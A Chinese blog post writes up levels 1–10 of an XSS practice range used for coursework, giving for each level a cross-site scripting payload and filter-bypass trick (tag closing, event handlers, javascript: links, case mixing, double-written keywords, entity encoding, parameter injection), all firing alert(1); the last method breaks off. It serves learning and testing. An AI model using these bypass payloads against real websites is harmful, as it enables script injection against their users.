XSS游戏挑战详解(上)
前言
最近刚学到xss,老师发了一个靶场,刚好拿来练练手,提升下技术,本文用于记录。
level-1
查看源代码,发现有参数name,那么尝试最基本的攻击,通关成功。
level-2
利用第一关的代码,发现输入的值在input标签内,这时尝试闭合标签
1 |
"><script>alert(1)</script> |
level-3
继续尝试利用第一关的代码,发现<>被过滤,此时尝试JavaScript鼠标事件。
1 |
' οnclick=alert(1)// |
level-4
查看源代码,发现跟第三关及其相似,此时采用双引号闭合标签,插入JavaScript鼠标事件
1 |
" οnclick=alert(1)// |
level-5
按照第四关的方法时,发现onclick被过滤成o_nclick
此时,我们可以尝试使用a标签
1 |
"> <a href="javascript:alert(1)">233</a>
|
level-6
利用第五关的方法,发现href被过滤成hr_ef,script跟on事件同第五关。
此时,我们尝试利用大小写绕过
1 |
"> <Script>alert(1)</script> // |
level-7
根据前几关的方法尝试,发现都不可行,大小写也被过滤。且script,on,href被置空。
此时,我们尝试利用双写绕过。
1 |
"><sscriptcript>alert(1)</sscriptcript> |
level-8
按套路,将前几关的代码都试了一遍,全部都不行,不是被过滤就是转义。
此时,我们可以尝试利用实体编码绕过
1 |
javascript:alert(1)
|
level-9
既然链接不合法,那我们就构造一个合法的链接
1 |
javascript:alert(1)//http:////
|
level-10
直接查看源代码,发现有三个参数,尝试往URL里加参数
1 |
?keyword=hack&t_link=1&t_history&t_sort=3
|
发现只有t_sort被写入了, 所以注入点就是t_sort参数
这里提供两种方法,
一、向t_sort传入代码
1 |
keyword=test&t_sort="type="text" onclick = "alert(1)
|
二、修改表单的工作方式,采用按钮提交,此方法可将代码永久注入到该页面
1 2 3 4 5 6 |
行云博客 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我([email protected])联系处理。敬请谅解!
本文链接:https://www.xy586.top/4065.html
转载请注明文章来源:行云博客 » XSS游戏挑战详解(上)